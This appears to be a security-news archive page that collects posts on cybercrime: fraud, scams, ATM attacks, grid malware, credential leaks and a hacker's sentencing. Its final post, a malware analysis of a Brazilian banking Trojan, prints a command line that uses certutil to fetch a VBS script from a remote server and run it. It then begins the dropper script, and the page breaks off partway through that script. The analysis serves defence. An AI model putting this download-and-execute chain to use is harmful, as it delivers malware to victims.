Category Archives: Cybercrime

Insight into the growing problem of highly sophisticated fraud

Sophisticated fraud campaigns are beginning to outwit machine learning solutions, especially the ones that only detect known fraud patterns based on historic loss experience, according to DataVisor. The median lifetime of IP fraud signals is only 3.5 days. As bad actors begin using modern technologies (even machine learning) in their attacks, enterprises must bolster detection efforts with a complete solution that can also detect new and emerging fraud patterns and detect them early, or risk … More

The post Insight into the growing problem of highly sophisticated fraud appeared first on Help Net Security.

Mobile Menace Monday: Is Fuchsia OS the end of Android?

It’s no secret that every year Google announces a new Android version. This time though, recent Google documents state that the next major Android version will be Android Q and not Android 9.1 Pie.

In parallel, Google is also developing an operating system called Fuchsia that’s supposedly going to replace Android in the near future. People were expecting to see a statement from Google about Fuchsia, or Andromeda (its previous codename), back in October 2017. But that never happened. Instead, we get to speculate for another year about whether or not it’s here to replace Android, or is simply a playground for developers. Here’s what we know so far.

A brief history of Google Fuchsia

Fuchsia is a capability-based operating system with a user interface, and it has the ability to scale up to larger devices like laptops and computers. It can also support ARM, MIPS, and x86 processors.

It first popped up on GitHub in August 2016 with zero fanfare or explanation from Google. Unlike Android and Chrome OS, Google Fuchsia is not based on Linux, but rather Google’s own new microkernel.

In May 2017, an experimental OS leaked. However, calling it an “OS” might be a misnomer. Basically, its system UI was up and running on top of Android and functioning like an app, but nothing else worked. Later, one of the developers working on the project teased that this was not just a dumping ground but a real project. This led to speculation that Google had larger plans for it.

Not long after, at the beginning of 2018, Google released news that the Fuchsia team picked the Chrome OS-powered Google Pixelbook as a supported device. A couple of curious users rushed out to test this claim. They confirmed that they were able to run Fuchsia on these Google Pixelbooks. This was one more big step forward. Since then, we’ve heard nothing more. However, we do know the components of Fuchsia, and they look promising.

The Fuchsia layer cake

Let’s take a closer look under the hood of this potential future Google OS. There are four distinct layers that hold the whole operating system together. Google uses a layer cake model when describing the organization of Fuchsia code, and we will not deviate from this scheme. So, let’s talk about each layer separately and in detail.

Zircon

It all starts with Zircon (formerly Magenta), the Fuchsia operating system’s new microkernel, which is based on LK (Little Kernel), a small operating system intended for embedded devices. Zircon is the foundation on which the rest of Fuchsia is built, and it primarily handles access to hardware and communication between software.

Garnet

The next layer, which sits atop Zircon, is called Garnet. Garnet consists of services needed by the OS, such as its network and graphics, together with the package manager and device drivers. Some worth mentioning here: Escher, a Vulkan-based graphics renderer with specific support for volumetric soft shadows; Amber, Fuchsia’s update system; and Xi Editor, a modern editor with a backend written in Rust.

Peridot

The next layer up, Peridot, mostly handles Fuchsia’s modular runtime design for app composition. What this means is that almost everything that exists in Fuchsia, including software and even system files, comes in packages, and Fuchsia packages can be made up of smaller components instead of large, all-in-one programs. One of the major components of Peridot is Ledger. Ledger is a storage system for Fuchsia that provides and manages separate data stores for apps/components across devices, syncing everything through a cloud provider.

Topaz

Topaz is the top layer and the one you’ll most likely interact with. It’s similar to Android’s pre-installed (factory) applications like messaging, contacts, phone, camera, and music. The most important part is the introduction of Flutter support. Flutter is a software development kit allowing cross-platform development for Fuchsia, Android, and iOS. Flutter produces apps based on Dart, an open-source, scalable programming language with robust libraries and runtimes for building web, server, and mobile apps. Because the Flutter software development kit offers cross-platform opportunities, users are able to install parts of Fuchsia on Android devices.

In addition, Google already announced Flutter 1.0 is out. The first stable release of Google’s UI toolkit for creating native experiences for iOS and Android from a single codebase is available at https://flutter.io.

Final thoughts

Let’s sum it up. Here’s what we know so far:

  • Google Fuchsia is a new OS in development from Google, but is still a ways off from completion.
  • The OS is based on the Zircon kernel, which makes it highly scalable and secure.
  • Flutter, a software development kit offering cross-platform opportunities, is already out.

Although Google said Fuchsia is just “one of many experimental open-source projects” at the company, we can already see a potential OS brewing that could replace Android. Microsoft once tried to create something similar under the code name Singularity, but it never shipped. That’s why there’s a big question mark over whether Fuchsia will actually replace Android and Chrome OS, or peter out like some of its predecessors.

Also, let’s remember that Android was hanging around for about five years before it launched in a real product. If Fuchsia follows a similar path, and everything goes well, maybe we can expect a consumer product sometime around 2020. Right now, it’s still a giant maybe. So if you’re feeling stressed about learning a new OS, there is still plenty of time to adjust—save the panicking for later in 2019.

The post Mobile Menace Monday: Is Fuchsia OS the end of Android? appeared first on Malwarebytes Labs.

Digital skills are critical for tackling the rising tide of cybercrime

The rising tide of cybercrime shows no sign of slowing. Whether it’s hacking, identity fraud or malware attacks, online criminals have proven themselves to be both relentless and ruthless. Targets have included public sector institutions and charities; even the UK’s National Health Service (NHS) was not spared. In this challenging climate, it is unsurprising that police forces are facing extreme pressure to protect victims and take meaningful action against the perpetrators, who are hard to track … More

The post Digital skills are critical for tackling the rising tide of cybercrime appeared first on Help Net Security.

Cybercrime gangs continue to innovate to hide their crimes

According to the APWG’s new Phishing Activity Trends Report, after spiking in the spring, phishing has been taking place at a steady pace — but phishers are using new techniques to carry out their attacks – and obfuscate their origins – to make the most of every phishing campaign. The total number of phish detected by APWG in Q3 2018 was 151,014. This was down from 233,040 in Q2 and 263,538 in Q1. There was … More

The post Cybercrime gangs continue to innovate to hide their crimes appeared first on Help Net Security.

Cyber Security Project Investment Proposal – DIA Needipedia – Fight Cybercrime and Cyber Jihad With Sensors – Grab Your Copy Today!

Dear blog readers, I decided to share with everyone a currently pending project investment proposal regarding the upcoming launch of a proprietary Technical Collection analysis platform with the project proposal draft available on request part of DIA's Needipedia Project Proposal Investment draft or eventually through the Smith Richardson Foundation. In case you're interested in working with me

McAfee Blogs: Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white Northface winter coat for my teenage daughter that she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wishlist that year.

After fighting the crowds and scouring the stores to no avail, I went online, stressed and exhausted with my credit card in hand looking for a deal and a Christmas delivery guarantee.

Mistake #1: I was under pressure and cutting it way too close to Christmas.
Mistake #2: I was stressed and exhausted.
Mistake #3: I was adamant about getting the best deal.

Gimme a deal!

It turns out these mistakes created the perfect storm for a scam. I found a site with several name-brand coats available at lower prices. I was thrilled to find the exact white coat and guaranteed delivery by Christmas. The cyber elves were working on my behalf for sure!

Only the coat never came and I was out $150.

In my haste and exhaustion, I overlooked a few key things about this “amazing” site that played into the scam. (I won’t harp on the part about me calling customer service a dozen times, writing as many emails, and feeling incredible stupidity over my careless clicking!)

Stress = Digital Risk

I’m not alone in my holiday behaviors it seems. A recent McAfee survey, Stressed Holiday Online Shopping, reveals, unfortunately, that when it comes to online shopping, consumers are often more concerned about finding a deal online than they are with protecting their cybersecurity in the process. 

Here are the kinds of risks stressed consumers are willing to take to get a holiday deal online:

  • 53% think the financial stress of the holidays can lead to careless shopping online.
  • 56% said that they would use a website they were unfamiliar with if it meant they would save money.
  • 51% said they would purchase an item from an untrusted online retailer to get a good deal.
  • 31% would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.
  • When it comes to sharing personal information to get a good deal: 39% said they would risk sharing their email address, 25% would wager their phone number, and 16% would provide their home address.

3 Tips to Safer Online Shopping:

  • Connect with caution. Using public Wi-Fi might seem like a good idea at the moment, but you could be exposing your personal information or credit card details to cybercriminals eavesdropping on the unsecured network. If public Wi-Fi must be used to conduct transactions, use a virtual private network (VPN) to help ensure a secure connection.
  • Slow down and think before you click. Don’t be like me, exhausted and desperate while shopping online — think before you click! Cybercriminals love to target victims by using phishing emails disguised as holiday savings or shipping notifications to lure consumers into clicking links that could lead to malware or a phony website designed to steal personal information. Check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use comprehensive security protection that can help protect devices against malware, phishing attacks, and other threats. Protect your personal information by using a home solution that keeps your identity and financial information secure.
  • Take a nap, stay aware. This may not seem like an important cybersecurity move, but during the holiday rush, stress and exhaustion can wear you down and contribute to poor decision-making online. Outsmarting the cybercrooks means awareness and staying ahead of the threats.

I learned the hard way that holiday stress and shopping do not mix and can easily compromise my online security. I lost $150 that day and I put my credit card information (promptly changed) firmly into a crook’s hands. I hope by reading this, I can help you save far more than that.

Here’s wishing you and your family the Happiest of Holidays! May all your online shopping be merry, bright, and secure from all those pesky digital Grinches!

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.


KoffeyMaker Toolkit Used in Black Box ATM Attacks Against Eastern European Banks

In 2017 and 2018, threat actors utilized a toolkit called KoffeyMaker in multiple black box ATM attacks targeting Eastern European financial institutions.

When Kaspersky Lab investigated KoffeyMaker in connection with the attacks, researchers discovered that the devices in the campaign consisted of Windows laptops containing ATM dispenser drivers and a patched KDIAG tool.

Those behind the attacks secretly opened an ATM at each targeted bank, connected the device to the cash dispenser, closed the ATM and walked away with the device still inside the machine.

Returning at a later time, attackers leveraged a USB GPRS modem to gain remote access to the device, run the KDIAG tool and execute a command for the ATM to dispense bank notes before retrieving the laptop — all while another attacker collected the money. Together, they then made their escape with potentially tens of thousands of dollars in tow.

ATM Attacks Aren’t New to Europe

Attacks like those involving KoffeyMaker aren’t new. As reported by Information Security Media Group (ISMG), the number of jackpotting attacks against ATMs in European countries grew by 231 percent in 2017. Of those attacks, the majority were black box campaigns. One of these cases involved the use of Cutlet Maker, ATM malware detected by Kaspersky Lab that is not unlike KoffeyMaker in its design.

Fortunately, law enforcement had some success in arresting criminals during that same span of time. In one of the most noteworthy takedowns, several EU member states and Norway, supported by Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT), arrested 27 individuals responsible for conducting black box ATM attacks across Europe.

How to Defend Against Tools Like KoffeyMaker

According to Kaspersky Lab, the only way for banks to defend against black box attacks is to use hardware encryption between an ATM’s computer and dispenser. Organizations should also implement a stronger data security strategy. This plan should include the use of encryption to protect sensitive cloud-based data.

Sources: Kaspersky Lab, ISMG, Kaspersky Lab (1), EC3

The post KoffeyMaker Toolkit Used in Black Box ATM Attacks Against Eastern European Banks appeared first on Security Intelligence.

SecurityWeek RSS Feed: AP Exclusive: Iran Hackers Hunt Nuke Workers, US Officials

LONDON — As U.S. President Donald Trump re-imposed harsh economic sanctions on Iran last month, hackers scrambled to break into personal emails of American officials tasked with enforcing them, The Associated Press has found — another sign of how deeply cyberespionage is embedded into the fabric of U.S.-Iranian relations.


Compromising vital infrastructure: the power grid

Where were you when the lights went out? That line became famous after the 1977 blackout in New York City. This power outage was caused by lightning and lasted for up to two days, depending on which part of New York you lived in. While in this case the power grid failure was a freak incident due to faulty backup equipment, it is still famous for the havoc it wreaked throughout the city—including looting and arson—during a time when national morale was already low.

Now imagine something similar happening today. Would it result in the same criminal chaos? My guess is it would depend on the circumstances and how much time it takes to restore power. Let’s hope we never find out.

Power grid hardware

The underlying hardware of the power grid has gone through a lot of improvements since 1977. And so have backup systems and procedures.

In many countries, a power interruption that lasts longer than a given threshold gives the consumer the right to claim damages from the power company. These damages are to be paid by the electricity distributor. The amount of the customer compensation and the threshold can vary from one country to another, but you can usually look them up on the website of your provider.

This is not to say that it’s impossible to do physical damage if an attacker is determined enough, as the 2013 sniper attack on a California energy grid substation demonstrated.

Recent regulations and improvements have made it rare to experience power outages of more than a few hours in the western world—unless there are special circumstances, such as natural disasters. Tornadoes, hurricanes, earthquakes, erupting volcanoes, flooding, and wildfires can cause power outages, which makes dealing with those disasters even more difficult. Any other power outages are usually restored quickly or covered by backup systems.

Malware

We are aware of several malware variants that are used against power supplies, and some of them can be held responsible for major power outages around the globe.

Stuxnet is a worm designed to spread through Windows systems and go after certain programmable controllers by seeking out the software related to these controllers. Stuxnet is believed to be specifically designed to destroy the Iranian nuclear program, but it can also be used to bring down power plants.

A group of hackers dubbed Sandworm and suspected to be based in Russia shut down part of the Ukrainian power grid in December 2015 using malware called BlackEnergy. The malware opened a backdoor that allowed the attackers to control infected machines to a level where they were able to cross over into the operational network. Once there, they started to flip switches, disabling IT infrastructure and deleting files. Earlier, in 2014, the US government reported that hackers had planted BlackEnergy on the networks of American power and water utilities, but nothing came of it.

If any countermeasures were taken in Ukraine, they turned out to be insufficient, or at least unable to withstand CrashOverRide. CrashOverRide, aka Industroyer, is an adaptable malware that can automate and orchestrate mass power outages. The power grid–sabotaging malware was likely the one used in the December 2016 cyberattack against Ukrainian electric utility Ukrenergo. The CrashOverRide malware can control legacy electricity substations’ switches and circuit breakers, allowing an attacker to simply turn off power distribution, leading to cascading failures and causing more severe damage to equipment.

Dragonfly, aka Energetic Bear, is a malware campaign that uses a variety of infection vectors in an effort to gain access to a victim’s network, including malicious emails, watering hole attacks, and Trojanized software. Part of this campaign was a malicious email disguised as an invitation to a New Year’s Eve party to targets in the energy sector in December 2015.

Sandworm malware, discovered in 2014, uses a vulnerability to launch external files from a malicious PowerPoint file. In a Sandworm attack, the malicious PowerPoint file pulls in two files from a remote server that combine to deliver the malware payload. Sandworm has been used in targeted attacks against NATO, the European Union, and companies in the telecommunications and energy sectors.

Backup systems

It may seem obvious to point out that critical systems like hospitals should have independent emergency power backup systems. And most of them do. But are they tested regularly for functionality? Do they have enough supplies to last during a prolonged power outage? Is there an option to turn them on manually if they fail to kick in automatically? And is someone available on premises who knows how to do this?

Emergency power systems come in many shapes and sizes. Standby generators are probably the most well-known, and they rely on some kind of fuel to provide the emergency power. Batteries, by contrast, use stored power and release this power when it’s needed. But batteries are generally only a solution for hours rather than days, and they tend to lose some charge even when they are not in use. It is imperative to find a backup solution that is robust enough to meet your needs in a worst-case scenario.

[Image: control room of a nuclear power plant]

Energy sources

Theoretically, there are other ways to disrupt the power grid, for example by cutting off the resources we use to run the power plants, such as coal, water, wind, solar, nuclear, and natural gas. This is a good reason to use a wide variety of resources, and another excellent reason to use renewable energy. It is also a good part of the reason why OPEC has so much influence in the world today.

To show that hacking into power supplies is not entirely theoretical, we want to mention that Iranian hackers infiltrated the control system of a small dam less than 20 miles from New York City in 2013. Unfortunately, many power plants are still accessible from the Internet in unnecessary ways that endanger their cybersecurity.

Countermeasures

Criminals have tools at their disposal with the capability to cause serious damage to the power grid. Therefore, the power industry must take precautions and upgrade cybersecurity to keep its systems safe. And it should do more than just abide by the minimum security standard. Power grid operators and their suppliers should have themselves tested on their ability to withstand cyberattacks on a regular basis.

This is especially true for nuclear power plants, where a loss of control can have more catastrophic consequences than just the loss of power output. Since 9/11, every company operating nuclear power plants has had an NRC-approved cybersecurity program in place, but cybersecurity was not such an issue when these plants were designed.

Besides cybersecurity, there are physical measures a government could enforce to improve the stability of a stressed power grid. As Joshua Pearce, a professor of electrical and computer engineering at Michigan Technological University, put it:

If we want to have a secure grid and go full throttle on renewable energy, what it means is we need to break up the grid into a bunch of microgrids that still act together as a full grid, so that we still have all the benefits that we have today with our giant centralized grid while still having the security.

In an attack, such a microgrid could be taken out without having an ill effect on all the other microgrids—which would make a successful attack less disastrous.

It would also stand to reason to take heed of the advice of Energy Secretary Rick Perry, who told lawmakers at an appropriations hearing that cyberattacks are literally happening hundreds of thousands of times a day. He warned that the Department of Energy needs an office of cybersecurity and emergency response in order to be prepared for threats like this in the future. And looking at what’s already taken place, plus what is vulnerable to attack: We have to agree.

The post Compromising vital infrastructure: the power grid appeared first on Malwarebytes Labs.

Hacking democracy efforts continue with upticks in malware deployments

Comodo Cybersecurity released its Global Threat Report 2018 Q3, offering insights from Comodo Threat Research Lab experts into key cyberthreat trends and the impact of malware on elections and other geopolitical events. Hacking democracy and malware in conflict zones The Comodo Q3 report also reveals disturbing upticks in malware deployment leading up to major national elections. Comodo Cybersecurity researchers document the impact of malware on elections in Russia, Turkey, Mali, Sierra Leone, Azerbaijan and Columbia. … More

The post Hacking democracy efforts continue with upticks in malware deployments appeared first on Help Net Security.

Criminals, Not State Actors, Target Russian Oil Company in 3-Year Cyber Attack

Security researchers have uncovered a three-year cyber attack on a Russian oil company that appeared at first glance to be state-sponsored, but later was found to be the work of cyber criminals seeking financial gain. The discovery is a cautionary tale for security experts not to be too rash when drawing conclusions about high-profile cyber...


6.8% of the top 100,000 websites still accept old, insecure SSL versions

Mac-based malware has appeared on the list of the top ten most common types of malware for the first time in WatchGuard’s quarterly Internet security report. The Mac scareware appeared in sixth place in WatchGuard’s latest Q3 2018 report and is primarily delivered by email to trick victims into installing fake cleaning software. Researchers also found that 6.8 percent of the world’s top 100,000 websites still accept old, insecure versions of the SSL encryption protocol, … More

The post 6.8% of the top 100,000 websites still accept old, insecure SSL versions appeared first on Help Net Security.

Android Trojan steals money from victims’ PayPal account

ESET researchers have unearthed a new Android Trojan that tricks users into logging into PayPal, then takes over and mimics the user’s clicks to send money to the attacker’s PayPal address. The heist won’t go unnoticed by the victim if they are looking at the phone screen, but they will also be unable to do anything to stop the transaction from being executed as it all happens in a matter of seconds. The only thing … More

The post Android Trojan steals money from victims’ PayPal account appeared first on Help Net Security.

November 2018: Most wanted malware exposed

Check Point has published its latest Global Threat Index for November 2018. The index reveals that the Emotet botnet has entered the Index’s top 10 ranking after researchers saw it spread through several campaigns, including a Thanksgiving-themed campaign. This involved sending malspam emails in the guise of Thanksgiving cards, containing email subjects such as happy “Thanksgiving day wishes”, “Thanksgiving wishes” and “the Thanksgiving day congratulation!” These emails contained malicious attachments, often with file names related … More

The post November 2018: Most wanted malware exposed appeared first on Help Net Security.

Security Affairs: Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries

Group-IB, an international company that specializes in preventing cyberattacks, has detected more than 40 000 compromised user credentials of online government services in 30 countries around the world.

Most of the victims were in Italy (52%), Saudi Arabia (22%) and Portugal (5%). Users’ data might have been sold on underground hacker forums or used in targeted attacks to steal money or exfiltrate sensitive information. CERT-GIB (Group-IB’s Computer Emergency Response Team) upon identification of this information promptly warned CERTs of the affected countries about the threat so that risks could be mitigated.

Group-IB Threat Intelligence has detected government websites’ user accounts compromised by cyber criminals in 30 countries. Official government portals including Poland (gov.pl), Romania (gov.ro), Switzerland (admin.ch), the websites of the Italian Ministry of Defense (difesa.it), Israel Defense Forces (idf.il), the Government of Bulgaria (government.bg), the Ministry of Finance of Georgia (mof.ge), the Norwegian Directorate of Immigration (udi.no), the Ministries of Foreign Affairs of Romania and Italy, and many other government agencies were affected by the data compromise.

Government employees, military and civilian citizens who had accounts on the official government portals of France (gouv.fr), Hungary (gov.hu) and Croatia (gov.hr) became victims of this data compromise. In total, the Group-IB Threat Intelligence system has detected more than 40 000 compromised user accounts of the largest government websites in 30 countries across the world over the past year and a half; Italy (52%), Saudi Arabia (22%) and Portugal (5%) were affected most.

According to Group-IB experts, cyber criminals stole user account data using spyware such as form grabbers and keyloggers, including Pony Formgrabber, AZORult and Qbot (Qakbot). Phishing emails were sent to personal and corporate email accounts. The infection came from malware included as an email attachment disguised as a legitimate file or archive. Once opened, it ran a Trojan aimed at stealing personal information. For instance, Pony Formgrabber retrieves login credentials from the configuration files, databases and secret stores of more than 70 programs on the victim’s computer and then sends the stolen information to the cyber criminals’ C&C server. Another Trojan-stealer, AZORult, aside from stealing passwords from popular browsers, is capable of stealing crypto wallet data. The Qbot worm gathers login credentials through a keylogger, steals cookie files, certificates and active internet sessions, and forwards users to fake websites.

The stolen user account data is usually sorted by subject (banks’ client data, government portal user accounts, combo lists of email and password) and goes on sale on underground hacker forums. It is worth noting that government websites’ user accounts are less common on the forums. Cyber criminals and state-sponsored APT groups specializing in sabotage and espionage are among those who can buy this information. Knowing the credentials of government websites’ users, hackers can not only obtain classified information from these websites but also infiltrate government networks. Even one compromised government employee’s account can lead to the theft of commercial or state secrets.

“The scale and simplicity of government employees’ data compromise shows that users, due to their carelessness and lack of reliable cyber defense, fall victim to hackers,” commented Alexandr Kalinin, head of Group-IB’s Computer Emergency Response Team (CERT-GIB). “Malware used by cyber criminals to compromise user accounts continues to evolve. For better protection against this type of attack, it is indeed important to not only use the most up-to-date anti-APT solutions, but also to know the context of the attacks: when, where and how exactly your data was compromised.”

The regularly updated Group-IB Threat Intelligence system provides actionable information about data leaks, compromised accounts, malware, infected IPs and existing vulnerabilities across the world. These unique indicators make it possible to prepare for cyberattacks in advance. Another important factor is international cooperation. To prevent further incidents, CERT-GIB experts contacted official CERTs in more than 30 countries and notified local incident response teams about the data compromise.

“Threat Intelligence data exchange between official government CERTs is crucial for the global fight against cybercrime,” highlights Alexandr Kalinin. “It is important for us to cooperate with other CERTs, which allows us to provide rapid incident response and gather more information about hackers’ evolving tactics and tools, indicators of compromise, and the most urgent threats. Cybercrime has no borders and affects private and public companies and ordinary citizens. International data exchange on current threats is a backbone of global stability.”

About the author: Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection. 

Pierluigi Paganini

(Security Affairs – leaked credentials, cybercrime)

The post Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries appeared first on Security Affairs.

Data scraping treasure trove found in the wild

We bring word of yet more data exposure, in the form of “nonsensitive” data scraping to the tune of 66m records across 3 large databases. The information was apparently scraped from various sources and left to gather dust, for anyone lucky enough to stumble upon it.

What is data scraping?

The gathering of information from websites, either by manual means, which isn’t time efficient, or by automated processes such as dedicated programs or bots. Often, this data scraping is for nefarious purposes and can be used for marketing or simply threatening behaviour. It also typically relies on the person being scraped having provided much of the grabbable data upfront. It’s frowned upon, but it’s often unclear where things stand legally.

Scrape all the things

Three large databases were found by security researchers, containing a combined tally of 66,147,856 unique records. At least one instance was exposed due to a lack of authentication. The records are very business-centric, with one (for example) containing full name, email, listed location, employment history, and skills. This sounds very much like the information you see on a public facing Linkedin profile. Indeed, many people have said they received breach notifications to their Linkedin specific mail, and there’s some mention of Github too.

Elsewhere, some 22 million records were found on the second server. This related to job search aggregation data, and this included IP, name, email, and potential job locations. Number 3 sang to the tune of 48 million records, and also sounds like a generic business-centric dump. Name, phone, employer, and so on.

Is the threat serious?

The information collected isn’t exactly a red hot dump of personal information, but it’s certainly useful for phishing attempts. It could also prove useful to anyone wanting a ready made marketing list. The big problem is that even if the ones doing the data scraping had no harmful intentions, that may not apply to anybody finding the treasure trove.

Given how this information was stumbled upon in the first place, there’s no real way to know how many bad actors got their hands on it first.

How can I reduce the scraping risk?

Well, that’s a good question. Given that the data was (mostly) freely given online in terms of the Linkedin profile information, it’s all about personal choice. Take a look at your Linkedin right now. Are you happy with what’s on display? Have you hidden any of it? Perhaps it’s a good idea to remove older roles, or jobs of a sensitive nature. Maybe that phone number doesn’t need to be so prominent. How about location, does it have to be so precise? Or would a broader area suffice?

Unfortunately, many people don’t consider the information they place online to be harmful, until it suddenly is. By the time it’s been scraped, plundered, and jammed into a larger database, it’s already too late to do anything about it.

The only real solution is to control every last aspect of what you’re happy to place in front of everybody else, which for most people involves having to dredge up a list of sites and accounts then start stripping things out. That’s fine; it’s never too late to start pulling things offline that don’t need to be there.

Next steps for anyone affected?

Given the very prominent business angle to this one, it’d be wise to consider who may look to take advantage of it. Alongside the previously mentioned phishers, this is the kind of thing someone could use alongside the offer of fake jobs. If you want to become a money mule, this could definitely be the “perfect” lead in!

A common destination for business-centric grab bags such as this one is unremarkable job search sites. Be on the lookout for a flood of poor quality job offer spam. Be especially wary if they come bearing gifts of paid membership, as nobody should pay someone who grabbed their data free of charge and is now using it to spam them with nonsense.

Ah yes, spam.

Scraped email lists will inevitably be harvested, so readjust your spam filters if needed. The good news is, most email offerings do a pretty good job of keeping your mailbox clean.

Almost all of us will end up in a data dump at some point. Whether scraped or hacked, being cautious around strange phone calls and peculiar emails will go a long way towards minimising any further potential harm.

The post Data scraping treasure trove found in the wild appeared first on Malwarebytes Labs.

Security Affairs: Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS

The British teenager George Duke-Cohan (19) has been sentenced to three years in prison for making false bomb threats and carrying out DDoS attacks.

Cohan was arrested on August 31 by the U.K. National Crime Agency (NCA). The teenager, aka “7R1D3N7,” “DoubleParallax” and “optcz1,” pleaded guilty to three counts of making hoax bomb threats.

According to investigators, the young man is the leader of the Apophis Squad, the hacking group that sent bomb threats to thousands of schools in the United Kingdom and the United States.

The group is also known for launching massive DDoS attacks against encrypted email provider ProtonMail, the popular investigator Brian Krebs, the DEF CON hacking conference, and government agencies worldwide.

The team was offering a DDoS-for-hire service that has many similarities with the booter implemented by the popular Lizard Squad hacking crew.

He has admitted making bomb threats to thousands of schools and against a United Airlines flight traveling from the UK to San Francisco in August, in many cases resulting in evacuations.
The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

Cohan has now been sentenced to one year in prison for the bomb hoaxes targeting schools, and two years for the airport attack.

Unfortunately for the British youngster, he will face additional charges in the United States, although the indictment has yet to be announced.

Before sentencing, the judge noted that Duke-Cohan’s early guilty pleas, his age, no prior criminal record and, to a limited extent, his “functioning deficiencies which have contributed to a diagnosis of autism,” were taken into consideration. However, these mitigating factors only helped his case to a certain degree.

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow,” said Judge Richard Foster.

“You were playing a cat-and-mouse game with the authorities. You were playing a game for your own perverted sense of fun in full knowledge of the consequences.”

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow,” Judge Richard Foster said, quoted by the Daily Mail. “What you did was far removed from anything that could be described as naivety or a cry for help from a sick person.”

Pierluigi Paganini

(Security Affairs – cybercrime, DDoS)

The post Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS appeared first on Security Affairs.

The Simpler the Better? Looking Deeper Into the Malware Used in Brazilian Financial Cybercrime

In the first article of this two-part series, we covered recent infection and fraud tactics, techniques and procedures (TTPs) used against Brazilian internet users. In this second post, we’ll cover the analysis of a popular remote overlay Trojan used by financial cybercrime actors in Brazil.

Remote overlay malware is quite prolific and generic, and although it happens now and then, it is generally rare to find financial malware in Brazil that could be deemed special or sophisticated. So what’s special about this particular variant? To begin, the dynamic link library (DLL) hijacking technique is not very common, although we have seen it before in Brazil. More interestingly, it seems that the malware’s operators are no longer focused on banks alone; they are now also interested in stealing users’ cryptocurrency exchange accounts, which ties in well with the growing appetite financial cybercrime has for cryptocurrency in Brazil.

Compromising Brazilian Users One Remote Session at a Time

IBM X-Force research follows the Brazilian threat landscape on an ongoing basis. In recent analyses, our team observed a new malware variant from the remote overlay family infecting users in the region.

Remote overlay Trojans are very common among Brazilian fraudsters who target local users. A recent generic variant we analyzed is able to remotely control infected devices using a DLL hijacking technique to load its malicious code into a legitimate binary file of a free antivirus program.

The malicious DLL, which is written in the Delphi programming language typical of Brazilian malware, contains overlay images that the malware plasters over the screen after an infected user authenticates an online banking session. The screens are made to match the look and feel of the victim’s bank and trick victims into providing personal information and two-factor authentication (2FA) elements.

Read the white paper: Preserving trust in digital financial services

Rising Interest in Cryptocurrency

Cryptocurrency trading accounts are becoming more popular than traditional brokerage accounts in Brazil — a trend that local fraudsters are likely familiar with and poised to exploit.

Variants we analyzed in recent campaigns against the major banks in Brazil also targeted cryptocurrency exchange platforms. The attack method is similar to how banks are targeted: by stealing the user’s account credentials, taking over their account and transferring their money to the criminals’ accounts.

A Typical Infection Routine

A look into the infection routine of this remote overlay Trojan shows that the initial compromise happens when a potential victim is lured into downloading what he or she believes to be an official invoice. The file is an archive that harbors the malicious scripts that will ultimately infect the device. Below is a summary of the typical infection tactic:

  1. The victim uses a search engine to find his or her provider’s website and pay a monthly invoice. Instead of the genuine website, the first result is a malicious page that attackers have boosted with paid efforts. The victim accesses that page and keys in his or her identification details to fetch the invoice.
  2. The victim unknowingly downloads a malicious LNK file — a Windows shortcut file — archived inside a ZIP file purporting to be from DETRAN, the ministry of transportation in Brazil.
  3. The LNK file contains a command that will download a malicious Visual Basic (VBS) script from a remote server and run it with a legitimate Windows program, certutil.
  4. The malicious VBS script downloads an additional ZIP file from the attacker’s remote server, this time containing the malware’s malicious DLL payload as well as a legitimate binary file of a free antivirus program it will use to hide the DLL.
  5. The VBS script executes the malware, infecting the device.
  6. Once deployed, the Trojan uses a DLL hijacking technique to load its malicious DLL into the legitimate binary of the antivirus program. This roundabout infection routine helps the malware evade detection by security controls.
  7. After completing the installation, the malware monitors the victim’s browser and goes into action when the victim navigates to a targeted online banking website or cryptocurrency exchange platform.
  8. The malicious DLL component gives the malware its remote control capabilities.

Zooming In on the Malicious LNK File

A closer look at the LNK file reveals the way it abuses certutil, which is installed as part of Certificate Services.

First, the malicious script is downloaded from the remote server under the name “tudodebom”:

  "C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f "https://remoteserver/turbulencianoar/tudodebom.txt" %temp%\tudodebom.txt && cd %temp% && rename "tudodebom.txt

  • -urlcache displays or deletes URL cache entries.
  • -split -f forces fetching of a specific URL and updating of the cache.

Once retrieved, the malware changes the file’s name and extension from “tudodebom.txt” to “JNSzlEYAIubkggX.vbs” and the command line continues as follows:

  "JNSzlEYAIubkggX.vbs" && C:\windows\system32\cmd.exe /k JNSzlEYAIubkggX.vbs

In short, the LNK file invokes the Windows command line (CMD) and executes certutil.exe to download a TXT file (which is actually a .vbs script) from a remote host:

  hXXps://remoteserver/turbulencianoar/tudodebom.txt

Lastly, the malware executes the malicious VBS script.

Examining the VBS Script

The VBS script downloads the ZIP archive containing the malware payload. It then deploys it on the victim’s device in a directory with the following naming pattern:

  "C:\AV product_" + RandomName + "\"

After that process is complete, the script executes the legitimate, but poisoned, binary that will load the malicious DLL and start a connection to the attacker’s command and control (C&C) server.

Interesting elements in this routine include:

  • The use of legitimate remote servers to host attack tools;
  • The abuse of a legitimate binary from an existing antivirus program to hide the malware’s DLL; and
  • The naming convention of the malware, which can make the malware easier to detect and quarantine on infected devices.

Upon analyzing the malware, we found the VBS script that the Trojan uses to deploy its malicious DLL to contain the following:

' Dropper script as recovered from the sample; comments describe what each step does.
Dim ubase, randname, exerandom, deffolder, filesuccess, filezip, fileexe, filedll

Set objShell = CreateObject("WScript.Shell")

' Payload archive on the attacker's server and a random suffix for the drop folder and executable name
